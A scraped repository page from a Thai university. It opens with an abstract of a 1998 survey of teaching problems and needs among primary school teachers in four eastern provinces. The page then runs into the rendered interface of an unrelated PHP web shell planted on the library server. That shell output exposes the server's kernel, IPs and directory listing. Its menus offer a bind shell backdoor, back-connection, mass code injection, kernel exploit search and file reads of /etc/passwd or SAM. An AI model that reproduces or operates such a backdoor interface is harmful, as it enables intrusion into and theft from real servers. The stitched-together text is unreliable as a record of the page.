ปัญหาและความต้องการด้านการพัฒนาการสอนของครูโรงเรียนประถมศึกษาในจังหวัดชลบุรี ระยอง สระแก้ว และจันทบุรี.

Titleปัญหาและความต้องการด้านการพัฒนาการสอนของครูโรงเรียนประถมศึกษาในจังหวัดชลบุรี ระยอง สระแก้ว และจันทบุรี.
Publication TypeResearch
Year of Publication2541
Authorsคณะศึกษาศาสตร์.
Institutionมหาวิทยาลัยบูรพา. (Burapha University).
Cityชลบุรี. (Chonburi).
Typeงานวิจัย.
Keywordsการสอน., ครู - - การศึกษาและการสอน (ประถมศึกษา)., ครูประถมศึกษา - - ไทย (ภาคตะวันออก)., สาขาการศึกษา., โรงเรียนประถมศึกษา.
Abstract การวิจัยครั้งนี้มีวัตถุประสงค์ คือ เพื่อสำรวจข้อมูลส่วนบุคคลสำรวจปัญหาด้านการสอน สำรวจความต้องการพัฒนาการสอนของครูโรงเรียนประถมศึกษาในจังหวัดชลบุรี ระยอง สระแก้ว และจันทบุรี และศึกษาความสัมพันธ์ระหว่างข้อมูลส่วนบุคคล ปัญหาและความต้องการพัฒนาด้านการสอน กลุ่มตัวอย่างได้แก่ ครูโรงเรียนประถมศึกษา สังกัดสำนักงานการประถมศึกษาอำเภอในจังหวัดชลบุรี ระยอง สระแก้ว และจันทบุรี จำนวน 505 คน ซึ่งได้มาโดยการสุ่มแบบชั้นภูมิ ผลการวิจัยเป็นดังนี้ 1. ด้านข้อมูลส่วนบุคคลพบว่า ผุ้ตอบแบบสอบถามส่วนใหญ่ มีอายุระหว่าง 36-40 ปี มีอายุราชการ 21 ปีขึ้นไป มีสถานภาพสมรส มีบ้านพักของตนเองนอกเขตเทสบาล มีรถยนต์ส่วนตัวใช้ ไม่มีปัญหาเรื่องค่าใช้จ่ายในการเพิ่มพุนความรู้ มีบิดามารดาที่มีอาชีพเกษตรกร มีวุฒิปริญญาตรี มีเกรดเฉลี่ยนที่จบการศึกษาสูงกว่า 2.50 จากสถาบันฝึกหัดครู สอนในโรงเรียนขนาดเล็กและขนาดกลาง ชอบสอนกลุ่มวิชาทักษะ และกลุ่มวิชาสร้างเสริมประสบการณ์ชีวิต และระดับชั้นที่ชอบสอนไม่มีความแตกต่างกันมากนัก 2. ด้านข้อมูลเกี่ยวกับปัญหาการสอนพบว่า ผู้ตอบแบบสอบถามส่วนใหญ่ให้ความเห็นว่าไม่เป็นปัญหาถึงร้อยละ 74.87 ประเด็นที่เป็นปัญหามากที่สุดคือ การใช้เทคโนโลยีใหม่ๆ ในการจัดการเรียนการสอน ประเด็นที่เป็นปัญหาค่อนข้างมากคือ ความรู้เกี่ยวกับเทคนิค การประเมินผลงานหรือโครงการ และประเด็นที่เป็นปัญหาน้อยที่สุดคือ ความรู้ความเข้าใจในเนื้อหาวิชาที่สอนและจุดประสงค์ของวิชาที่สอน 3. ด้านข้อมูลกี่ยวกับความต้องการในการพัฒนาการสอนพบว่า ผู้ตอบแบบสอบถามส่วนใหญ่มีความต้องการในการพัฒนาการสอนถึงร้อยละ 76.64 สิ่งที่ต้องการพัฒนามากที่สุด คือ การสอนเกี่ยวกับคอมพวเตอร์เบื้องต้น สิ่งที่ต้องการพัฒนาอันดับรองลงไป ได้แก่ การพัฒนาความสามารถในการปฏิบัติการทดลองทางวิทยาศาสตร์ และความรู้เกี่ยวกับรูปแบบการสอนที่พัฒนาขึ้นใหม่ และสิ่งที่ต้องการพัฒนาน้อยที่สุด ได้แก่ ความรู้ในวิชาพลานามัย และการสอนให้เด็กเข้าใจเกี่ยวกับสภาพท้องถิ่นและประเทศ
Research Notesงานวิจัยนี้ได้รับทุนอุดหนุนจากคณะศึกษาศาสตร์ มหาวิทยาลัยบูรพา ปีงบประมาณ 2541
GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 266.19 GB of 389.83 GB (68.28%)Server IP: 10.32.1.15 - Your IP: 23.23.46.20

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0211 ]:.